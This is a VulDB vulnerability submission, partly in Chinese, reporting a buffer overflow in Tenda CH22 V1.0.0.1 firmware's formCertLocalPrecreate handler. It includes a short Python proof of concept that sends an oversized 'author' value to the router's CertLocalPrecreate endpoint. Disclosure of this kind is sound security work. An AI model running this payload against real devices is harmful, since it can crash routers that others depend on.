提交 #858000: Tenda CH22 V1.0.0.1 Buffer Overflow信息

标题Tenda CH22 V1.0.0.1 Buffer Overflow
描述## Overview - Firmware download website: https://www.tenda.com.cn/download/2230 ## Affected version CH22 V1.0.0.1 ## Vulnerability details The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `formCertLocalPrecreate` function. The `V11` variable receives the `author` parameter from a POST request and is later passed to the `sprintf` function. However, since the user can control the input of `author` , the statement `sprintf(s, "CN = %s/emailAddress=%s\n", v11, v10);` can cause a buffer overflow. ## PoC ``` import requests ip = "192.168.1.1" url = f'http://{ip}/goform/CertLocalPrecreate' payload = b'a' * 1000 data = {    'author':payload } requests.post(url, data=data) ```
来源⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-formCertLocalPrecreate-377df0aa118580e99c96f8ecf4475563
用户
 ysnysn0121 (UID 86198)
提交2026-06-13 16時13分 (1 月前)
管理2026-07-18 12時08分 (1 month later)
状态重复
VulDB条目355396 [Tenda CH22 1.0.0.1 Parameter CertLocalPrecreate formCertLocalPrecreate standard 内存损坏]
积分0

Do you know our Splunk app?

Download it now for free!